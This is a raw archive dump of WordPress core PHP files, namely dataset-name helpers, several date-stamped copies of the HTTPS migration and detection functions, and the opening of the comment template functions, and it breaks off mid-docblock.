* 0 === strlen( wp_js_dataset_name( 'data-' ) );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_html_custom_data_attribute_name()
*
* @param string $html_attribute_name Raw attribute name as found in the source HTML.
* @return string|null Transformed `dataset` name, if interpretable as a custom data attribute, else `null`.
*/
function wp_js_dataset_name( string $html_attribute_name ): ?string {
if ( 0 !== substr_compare( $html_attribute_name, 'data-', 0, 5, true ) ) {
return null;
}
$end = strlen( $html_attribute_name );
/*
* If it contains characters which would end the attribute name parsing then
* something else is wrong and this contains more than just an attribute name.
*/
if ( ( $end - 5 ) !== strcspn( $html_attribute_name, "=/> \t\f\r\n", 5 ) ) {
return null;
}
/**
* > For each name in list, for each U+002D HYPHEN-MINUS character (-)
* > in the name that is followed by an ASCII lower alpha, remove the
* > U+002D HYPHEN-MINUS character (-) and replace the character that
* > followed it by the same character converted to ASCII uppercase.
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
*/
$custom_name = '';
$at = 5;
$was_at = $at;
while ( $at < $end ) {
$next_dash_at = strpos( $html_attribute_name, '-', $at );
if ( false === $next_dash_at || $next_dash_at === $end - 1 ) {
break;
}
// Transform `-a` to `A`, for example.
$c = $html_attribute_name[ $next_dash_at + 1 ];
if ( ( $c >= 'A' && $c <= 'Z' ) || ( $c >= 'a' && $c <= 'z' ) ) {
$prefix = substr( $html_attribute_name, $was_at, $next_dash_at - $was_at );
$custom_name .= strtolower( $prefix );
$custom_name .= strtoupper( $c );
$at = $next_dash_at + 2;
$was_at = $at;
continue;
}
$at = $next_dash_at + 1;
}
// If nothing has been added it means there are no dash-letter pairs; return the name as-is.
return '' === $custom_name
? strtolower( substr( $html_attribute_name, 5 ) )
: ( $custom_name . strtolower( substr( $html_attribute_name, $was_at ) ) );
}
/**
* Returns a corresponding HTML attribute name for the given name,
* if that name were found in a JS element’s `dataset` property.
*
* Example:
*
* 'data-post-id' === wp_html_custom_data_attribute_name( 'postId' );
* 'data--before' === wp_html_custom_data_attribute_name( 'Before' );
* 'data---one---two---' === wp_html_custom_data_attribute_name( '-One--Two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_html_custom_data_attribute_name( '/not-an-attribute/' );
* null === wp_html_custom_data_attribute_name( 'no spaces' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* 'data-' === wp_html_custom_data_attribute_name( '' );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_js_dataset_name()
*
* @param string $js_dataset_name Name of JS `dataset` property to transform.
* @return string|null Corresponding name of an HTML custom data attribute for the given dataset name,
* if possible to represent in HTML, otherwise `null`.
*/
function wp_html_custom_data_attribute_name( string $js_dataset_name ): ?string {
$end = strlen( $js_dataset_name );
if ( 0 === $end ) {
return 'data-';
}
/*
* If it contains characters which would end the attribute name parsing then
* something it’s not possible to represent this in HTML.
*/
if ( strcspn( $js_dataset_name, "=/> \t\f\r\n" ) !== $end ) {
return null;
}
$html_name = 'data-';
$at = 0;
$was_at = $at;
while ( $at < $end ) {
$next_upper_after = strcspn( $js_dataset_name, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', $at );
$next_upper_at = $at + $next_upper_after;
if ( $next_upper_at >= $end ) {
break;
}
$prefix = substr( $js_dataset_name, $was_at, $next_upper_at - $was_at );
$html_name .= strtolower( $prefix );
$html_name .= '-' . strtolower( $js_dataset_name[ $next_upper_at ] );
$at = $next_upper_at + 1;
$was_at = $at;
}
if ( $was_at < $end ) {
$html_name .= strtolower( substr( $js_dataset_name, $was_at ) );
}
return $html_name;
}
https-migration-20260605165221-20260621230001.php 0000666 00000011205 15224151220 0013334 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260606132425-20260621081112.php 0000666 00000013341 15224151220 0013334 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class.wp-scripts-20260605035628.php 0000666 00000000527 15224151220 0012070 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-detection-20260605112435-20260621212853.php 0000666 00000013341 15224151220 0013342 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605193309-20260621081205-20260621135804.php 0000666 00000013341 15224151220 0014733 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
comment-template.php 0000666 00000311351 15224151220 0010532 0 ustar 00 <?php
/**
* Comment template functions
*
* These functions are meant to live inside of the WordPress loop.
*
* @package WordPress
* @subpackage Template
*/
/**
* Retrieves the author of the current comment.
*
* If the comment has an empty comment_author field, then 'Anonymous' person is
* assumed.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to retrieve the author.
* Default current comment.
* @return string The comment author
*/
function get_comment_author( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! empty( $comment->comment_ID ) ) {
$comment_id = $comment->comment_ID;
} elseif ( is_scalar( $comment_id ) ) {
$comment_id = (string) $comment_id;
} else {
$comment_id = '0';
}
if ( empty( $comment->comment_author ) ) {
$user = ! empty( $comment->user_id ) ? get_userdata( $comment->user_id ) : false;
if ( $user ) {
$comment_author = $user->display_name;
} else {
$comment_author = __( 'Anonymous' );
}
} else {
$comment_author = $comment->comment_author;
}
/**
* Filters the returned comment author name.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author', $comment_author, $comment_id, $comment );
}
/**
* Displays the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author.
* Default current comment.
*/
function comment_author( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author = get_comment_author( $comment );
/**
* Filters the comment author's name for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_author', $comment_author, $comment->comment_ID );
}
/**
* Retrieves the email of the author of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's email.
* Default current comment.
* @return string The current comment author's email
*/
function get_comment_author_email( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
/**
* Filters the comment author's returned email address.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_email The comment author's email address.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author_email', $comment->comment_author_email, $comment->comment_ID, $comment );
}
/**
* Displays the email of the author of the current global $comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's email.
* Default current comment.
*/
function comment_author_email( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_email = get_comment_author_email( $comment );
/**
* Filters the comment author's email for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author_email The comment author's email address.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'author_email', $comment_author_email, $comment->comment_ID );
}
/**
* Displays the HTML email link to the author of the current comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 0.71
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's email address.
* Default empty.
* @param string $before Optional. Text or HTML to display before the email link. Default empty.
* @param string $after Optional. Text or HTML to display after the email link. Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default is the current comment.
*/
function comment_author_email_link( $link_text = '', $before = '', $after = '', $comment = null ) {
$link = get_comment_author_email_link( $link_text, $before, $after, $comment );
if ( $link ) {
echo $link;
}
}
/**
* Returns the HTML email link to the author of the current comment.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address. Most assume that
* their email address will not appear in raw form on the site. Doing so will
* enable anyone, including those that people don't want to get the email
* address and use it for their own means good and bad.
*
* @since 2.7.0
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's email address.
* Default empty.
* @param string $before Optional. Text or HTML to display before the email link. Default empty.
* @param string $after Optional. Text or HTML to display after the email link. Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default is the current comment.
* @return string HTML markup for the comment author email link. By default, the email address is obfuscated
* via the {@see 'comment_email'} filter with antispambot().
*/
function get_comment_author_email_link( $link_text = '', $before = '', $after = '', $comment = null ) {
$comment = get_comment( $comment );
/**
* Filters the comment author's email for display.
*
* Care should be taken to protect the email address and assure that email
* harvesters do not capture your commenter's email address.
*
* @since 1.2.0
* @since 4.1.0 The `$comment` parameter was added.
*
* @param string $comment_author_email The comment author's email address.
* @param WP_Comment $comment The comment object.
*/
$comment_author_email = apply_filters( 'comment_email', $comment->comment_author_email, $comment );
if ( ( ! empty( $comment_author_email ) ) && ( '@' !== $comment_author_email ) ) {
$display = ( '' !== $link_text ) ? $link_text : $comment_author_email;
$comment_author_email_link = $before . sprintf(
'<a href="%1$s">%2$s</a>',
esc_url( 'mailto:' . $comment_author_email ),
esc_html( $display )
) . $after;
return $comment_author_email_link;
} else {
return '';
}
}
/**
* Retrieves the HTML link to the URL of the author of the current comment.
*
* Both get_comment_author_url() and get_comment_author() rely on get_comment(),
* which falls back to the global comment variable if the $comment_id argument is empty.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's link.
* Default current comment.
* @return string The comment author name or HTML link for author's URL.
*/
function get_comment_author_link( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! empty( $comment->comment_ID ) ) {
$comment_id = $comment->comment_ID;
} elseif ( is_scalar( $comment_id ) ) {
$comment_id = (string) $comment_id;
} else {
$comment_id = '0';
}
$comment_author_url = get_comment_author_url( $comment );
$comment_author = get_comment_author( $comment );
if ( empty( $comment_author_url ) || 'http://' === $comment_author_url ) {
$comment_author_link = $comment_author;
} else {
$rel_parts = array( 'ugc' );
if ( ! wp_is_internal_link( $comment_author_url ) ) {
$rel_parts = array_merge(
$rel_parts,
array( 'external', 'nofollow' )
);
}
/**
* Filters the rel attributes of the comment author's link.
*
* @since 6.2.0
*
* @param string[] $rel_parts An array of strings representing the rel tags
* which will be joined into the anchor's rel attribute.
* @param WP_Comment $comment The comment object.
*/
$rel_parts = apply_filters( 'comment_author_link_rel', $rel_parts, $comment );
$rel = implode( ' ', $rel_parts );
$rel = esc_attr( $rel );
// Empty space before 'rel' is necessary for later sprintf().
$rel = ! empty( $rel ) ? sprintf( ' rel="%s"', $rel ) : '';
$comment_author_link = sprintf(
'<a href="%1$s" class="url"%2$s>%3$s</a>',
$comment_author_url,
$rel,
$comment_author
);
}
/**
* Filters the comment author's link for display.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_author` and `$comment_id` parameters were added.
*
* @param string $comment_author_link The HTML-formatted comment author link.
* Empty for an invalid URL.
* @param string $comment_author The comment author's username.
* @param string $comment_id The comment ID as a numeric string.
*/
return apply_filters( 'get_comment_author_link', $comment_author_link, $comment_author, $comment_id );
}
/**
* Displays the HTML link to the URL of the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's link.
* Default current comment.
*/
function comment_author_link( $comment_id = 0 ) {
echo get_comment_author_link( $comment_id );
}
/**
* Retrieves the IP address of the author of the current comment.
*
* @since 1.5.0
